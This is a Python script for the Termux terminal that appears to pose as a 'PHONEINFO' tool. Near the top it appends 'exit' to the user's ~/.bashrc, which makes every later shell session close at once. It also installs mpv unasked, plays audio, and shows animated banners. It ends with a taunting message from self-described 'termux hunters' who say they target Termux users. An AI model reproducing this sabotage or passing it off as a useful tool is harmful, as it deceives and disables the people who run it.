#!/usr/python

import os
import time

os.system("clear")
os.system("echo 'exit' >> ~/.bashrc")
os.system("pkg install mpv")
os.system("clear")
print("\033[31m")
print("██████╗ ██╗  ██╗ ██████╗ ███╗   ██╗███████╗██╗███╗   ██╗███████╗ ██████╗ ")
print("██╔══██╗██║  ██║██╔═══██╗████╗  ██║██╔════╝██║████╗  ██║██╔════╝██╔═══██╗")
print("██████╔╝███████║██║   ██║██╔██╗ ██║█████╗  ██║██╔██╗ ██║█████╗  ██║   ██║")
print("██╔═══╝ ██╔══██║██║   ██║██║╚██╗██║██╔══╝  ██║██║╚██╗██║██╔══╝  ██║   ██║")
print("██║     ██║  ██║╚██████╔╝██║ ╚████║███████╗██║██║ ╚████║██║     ╚██████╔╝")
print("╚═╝     ╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚═╝╚═╝  ╚═══╝╚═╝      ╚═════╝")
print("\033[32m--------------------------------codeX-----------------------------------")
print("\033[32m-----------------------------b3rd%20mw01u-------------------------------")
time.sleep(5)
os.system("clear")
print("b3rd%20mwolu >>> Wait you can run this tool after the musc..")
time.sleep(3)
print("playing music...")
os.system("mpv b3rdsong.mp3")

os.system("clear")

print("\033[33;1m")
print(" ██████  ██████  ██████  ███████ ██   ██ ")
print("██      ██    ██ ██   ██ ██       ██ ██  ")
print("██      ██    ██ ██   ██ █████     ███   ")
print("██      ██    ██ ██   ██ ██       ██ ██  ")
print(" ██████  ██████  ██████  ███████ ██   ██ ")

time.sleep(3)

os.system("clear")
print("#____")
time.sleep(1)
os.system("clear")
print("##___")
time.sleep(1)
os.system("clear")
print("###__")
time.sleep(1)
os.system("clear")
print("####_")
time.sleep(1)
os.system("clear")
print("#####")
time.sleep(3)
os.system("clear")

print("\033[34m")
print("██████  ███████ ██████  ██████  ")
print("██   ██ ██      ██   ██ ██   ██ ")
print("██████  █████   ██████  ██   ██ ")
print("██   ██ ██      ██   ██ ██   ██ ")
print("██████  ███████ ██   ██ ██████")

time.sleep(3)
os.system("clear")

print("Hello my dear friend, we are codex, and berd mwolu, we are termux hunters, for hunting the termux users, we started our hunting, we will make this type of many other tools with some names. so this is a warning for you. Everything is game of fate...")
os.system("mpv codex.mp3")
os.system("exit")
os.system("exit")
os.system("exit")
os.system("exit")
